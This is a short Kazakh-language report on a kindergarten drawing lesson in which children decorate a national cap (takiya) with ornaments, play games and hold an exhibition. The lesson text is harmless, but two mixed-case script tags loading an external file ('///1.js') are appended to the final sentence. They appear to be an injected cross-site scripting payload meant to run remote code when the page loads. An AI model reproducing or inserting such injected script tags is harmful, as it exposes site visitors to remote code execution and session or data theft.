Педагогикалық шеберлік онкүндігі. Тәрбиеші:Арипова Лазиза Каршибековна Білімім-жоғары,1-санатты. 10"Күншуақ" ересек-логопедтік топ. Білім беру саласы; Шығармашылық Бөлімі: Сурет салу. Тақырыбы: «Тақияны әшекелейміз» Мақсаты: қазақтың ұлттық киімдерін ажыратады , тақияны салу жолдарын біледі және оны ою-өрнектермен әшекелей алады. Ою-өрнектегі өзара үйлестіреді,.Бала бойында 4К моделі дағдысы қалыптасқан. Жұмыс орынын ретке келтіреді,тазалықты сақтайды. Барысы:Оқу қызмет барысында балалар қазақтың ұлттық киімдері,соның ішінде бас киім тақиямен танысады және тақияны салады.Тақияны ою-өрнектермен әшекелей отырып"ирексу"және "қызғалдақ"оюларын салуды үйренді."Қандай бас киім артық" ойынында артық бас киімді тауып, оны түсіндірді. Жұмбақтар шешті,тыйым сөздерді қайталады. Командаға бөлініп,"Қандай бас киім жасырынған"ойынын ойнады. Ойынға балалар белсене қатысты.Оқу қызметі соңында балалар салған суреттерінен көрме жасап өз ойларын айтты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>